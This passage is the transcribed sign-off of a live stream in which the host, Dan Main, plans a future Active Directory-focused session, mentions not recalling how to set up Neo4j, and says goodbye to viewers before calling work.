gonna try to do another one next Tuesday where it's pure Active Directory. I'm gonna just try to do as much recon as possible to make sure that what we're getting into is actually pure Active Directory and not anything web related. Even though this was fun, right? I did want to, I want to just have one live stream where I show you all my sick Active Directory skills. I don't remember how to set up Neo4j either, so that's why I'm going to get off as well. So I'll see you guys tomorrow. I don't know what I'm doing tomorrow right now. I normally come up with what I'm doing around like 4 o'clock Eastern time, and then I create a thumbnail and I just put it up. It won't be as exciting as this, so I'm just warning you right now. So peace out. Y'all know where to find me if y'all need me. This is Dan Main. I gotta call work because I normally go into work around this time and I haven't said anything to anybody. So let me do that, bro. Y'all take it easy, bro. I'm out. Peace. Yeah, bro.